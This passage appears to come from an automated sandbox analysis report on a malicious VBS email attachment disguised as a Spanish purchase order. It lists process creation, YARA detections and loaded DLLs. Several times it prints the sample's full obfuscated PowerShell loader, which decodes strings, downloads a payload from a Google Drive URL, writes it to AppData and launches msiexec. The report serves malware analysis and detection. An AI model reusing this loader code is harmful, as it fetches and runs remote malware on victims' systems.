oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUd
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7BFEDB0F62_2_00007FF7BFEDB0F6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7BFEDBEA22_2_00007FF7BFEDBEA2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7BFFA91382_2_00007FF7BFFA9138
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7BFFAAB4A2_2_00007FF7BFFAAB4A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_029EEDF05_2_029EEDF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_029EF6C05_2_029EF6C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_029EEAA85_2_029EEAA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DCD2787_2_02DCD278
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DC53627_2_02DC5362
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DCC1467_2_02DCC146
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DCC7387_2_02DCC738
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DCC4687_2_02DCC468
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DCCA087_2_02DCCA08
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DCE9887_2_02DCE988
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DCCFAB7_2_02DCCFAB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DCCCD87_2_02DCCCD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DCA0887_2_02DCA088
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DC71187_2_02DC7118
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DC3AA17_2_02DC3AA1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DC29EC7_2_02DC29EC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DC39ED7_2_02DC39ED
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DC69A07_2_02DC69A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DCE97B7_2_02DCE97B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DCF9617_2_02DCF961
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02DC3E097_2_02DC3E09
              Source: Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7033
              Source: unknownProcess created: Commandline size = 7033
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7033Jump to behavior
              Source: amsi32_1516.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1516, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@8/7@5/5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Bindehindens.StuJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2112:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sytlxl2n.m0d.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7924
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1516
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsReversingLabs: Detection: 18%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
